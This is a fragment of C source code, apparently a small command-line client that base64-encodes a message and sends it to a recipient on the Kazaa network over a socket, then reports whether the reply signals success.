                printf(" :: ERROR: Can't open socket\n\n");
                exit(-1);
        }
        bzero(buffer,sizeof(buffer));   
        if(!connect(sock,(struct sockaddr *)&TheHoSt, sizeof(TheHoSt))) {
        
                printf(" :: Sending message to %s from %s@%s\n", id, id_, minetwork);fflush(stdout);

                /* Get msg length: each word plus a trailing space */
                cont=2; c_=0;
                while (cont < argc){
                        c_ = c_ + strlen(argv[cont++])+1; 
                }
                
                /* Allocate buffer (+1 for the terminating NUL that strcat writes) */
                msg = malloc (c_+1);
                bzero (msg, c_+1);
                
                /* Store msg in buffer */
                cont=2;
                while (cont < argc){
                        strcat(msg,argv[cont]);
                        strcat(msg, " ");
                        cont++;
                }

                /* Output buffer for radix64 conv (4/3 expansion plus padding and newline) */
                msgr64 = malloc (2*c_+8);
                bzero (msgr64, 2*c_+8);
                
                /* Convert msg to radix 64 */
                enc64( msgr64, 2*c_+8, &olth, (unsigned char *)msg, c_, 9999, 0 );

                /* Store in buffer */
                c_ = strlen (msgr64)+strlen(kazaa_head)+strlen(id_)+strlen(id)+strlen(minetwork)+3;
                btmp = malloc(c_);
                bzero(btmp, c_);
                sprintf (btmp, kazaa_head, id_, minetwork,  id,  msgr64);
                send(sock,btmp,strlen(btmp),0);
                        while ((recv(sock,buffer,sizeof(buffer)-1,0)!=-1) && (buffer[0] !=0)){ /* -1 keeps the NUL */
                                if (strstr(buffer, "200")){ // HTTP OK 
                                        printf(" :: Message sent.\n\n");
                                        close(sock);
                                        exit(0);
                                        }
                                bzero(buffer,sizeof(buffer)); //Clear Buffer                            
                                }

                        printf(" :: Can't deliver message\n\n\n\n");
        } else {
                close(sock); 
                printf(" :: Can't connect. Service unavailable.\n\n");
                exit(-1);
        }
        close(sock);  //Remote host will close it when finished
        return (-1);
}

/* End Of File ----------------------------------------------------------------------------*/






